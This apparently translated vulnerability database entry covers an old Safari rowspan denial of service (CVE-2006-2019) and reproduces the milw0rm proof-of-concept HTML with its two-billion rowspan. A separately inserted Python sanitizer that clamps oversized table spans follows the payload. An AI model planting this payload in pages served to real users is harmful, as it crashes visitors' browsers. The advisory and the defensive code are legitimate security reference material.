Apple Safari Web Browser rowspan Denial of Service Vulnerability

Vulnerability ID: 1110131    Vulnerability type: Other
Published: 2006-04-24    Updated: 2006-04-26
CVE ID: CVE-2006-2019    CNNVD ID: CNNVD-200604-451
Platform: OSX    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/1715
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-451
|Vulnerability details
Apple Safari is the web browser shipped with Apple's family of operating systems. Safari contains a vulnerability in how it processes web pages: a malicious website can cause the browser to crash. When Safari opens a malicious HTML file, the operating system may slow down to the point of the SRCOD (Spinning Rainbow Cursor Of Death), so no application can be launched to kill the process. After several minutes Safari crashes.
|Vulnerability EXP
<!--
Apple Mac OS X Safari 2.0.3 Vulnerability
=========================================

Author: Yannick von Arx
Email:  yannick[dot]vonarx[at]yanux[dot]ch

Release Date:
April 23rd, 2006

Vendor:
Apple Computer Inc.

Tested on:
iBook G4 1.2 GHz with Mac OS X 10.4.5 (Build 8H14) + all Updates from Apple except "10.4.6 Update"
iBook G4 1.33 GHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple
PowerMac G4 Dual 867 MHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple
iMac G4 800 MHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple

Versions affected:
Safari 2.0.3 (417.9.2) latest version under 10.4.5 (Build 8H14) and perhaps prior versions
Safari 2.0.3 (417.9.2) latest version under 10.4.6 (Build 8I127) and perhaps prior versions

Overview:
A vulnerability exists in Safari 2.0.3 (417.9.2) and perhaps in
prior versions which causes the operating system to slow down SRCOD
(Spinning Rainbow Cursor Of Death), and therefore, it's not possible
to launch any applications like Terminal to kill the process. After
several minutes Safari crashes.

Technical Details:
Create a new File with following code ... -->

<HTML>
<TABLE>
<TR><TD ROWSPAN=2000000000>

# milw0rm.com [2006-04-24]
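As an added defensive example (not part of the advisory or of this page): a small Python audit that parses HTML with the standard library, flags td/th rowspan or colspan values above the limits modern browsers clamp to, and re-emits the markup with the value clamped. The limits (rowspan 65534, colspan 1000, per the HTML Living Standard) are assumptions for this example, and the POC input is constructed to mirror the advisory's PoC shape.

```python
from html.parser import HTMLParser

# Browser clamp limits per the HTML Living Standard (rowspan 65534,
# colspan 1000); assumptions here, the 2006 advisory names no limit.
MAX_ROWSPAN = 65534
MAX_COLSPAN = 1000

class SpanAuditor(HTMLParser):
    """Flag td/th rowspan/colspan values above the clamp and re-emit the
    markup with the value clamped. Comments/doctypes are not re-emitted."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # (tag, attribute, original integer value)
        self.out = []

    def _clamp(self, tag, attr, value):
        try:
            n = int(value.strip())
        except (ValueError, AttributeError):
            return value  # non-numeric: browser falls back to default
        limit = MAX_ROWSPAN if attr == "rowspan" else MAX_COLSPAN
        if n > limit:
            self.findings.append((tag, attr, n))
            return str(limit)
        return value

    def handle_starttag(self, tag, attrs):  # names arrive lowercased
        fixed = []
        for name, value in attrs:
            if tag in ("td", "th") and name in ("rowspan", "colspan"):
                value = self._clamp(tag, name, value)
            fixed.append((name, value))
        rendered = "".join(f' {n}="{v}"' if v is not None else f" {n}"
                           for n, v in fixed)
        self.out.append(f"<{tag}{rendered}>")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

def audit_spans(html):
    """Return (findings, rewritten_html) for one document."""
    p = SpanAuditor()
    p.feed(html)
    p.close()
    return p.findings, "".join(p.out)

# Constructed sample mirroring the advisory's PoC: a two-billion-row span.
POC = "<HTML><TABLE><TR><TD ROWSPAN=2000000000>x</TD></TR></TABLE></HTML>"
```

Running audit_spans(POC) reports the oversized span and returns the table with rowspan reduced to 65534; a value that a browser cannot clamp to a sane size is exactly what a sanitizer in front of untrusted HTML should log and cut down.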
|References

Source: BID
Name: 17674
Link: http://www.securityfocus.com/bid/17674
Source: BUGTRAQ
Name: 20060424 Re: Apple Mac OS X Safari 2.0.3 Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/431944/100/0/threaded
Source: BUGTRAQ
Name: 20060424 Apple Mac OS X Safari 2.0.3 Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/431874/100/0/threaded
Source: VUPEN
Name: ADV-2006-1508
Link: http://www.frsirt.com/english/advisories/2006/1508
Source: SECTRACK
Name: 1015982
Link: http://securitytracker.com/id?1015982
Source: SECUNIA
Name: 19763
Link: http://secunia.com/advisories/19763
Source: FULLDISC
Name: 20060424 Apple Mac OS X Safari 2.0.3 Vulnerability
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/045472.html
Source: XF
Name: macosx-safari-table-dos(25998)
Link: http://xforce.iss.net/xforce/xfdb/25998
Source: MILW0RM
Name: 1715
Link: http://www.milw0rm.com/exploits/1715
Source: MILW0RM
Name: 1715
Link: http://milw0rm.com/exploits/1715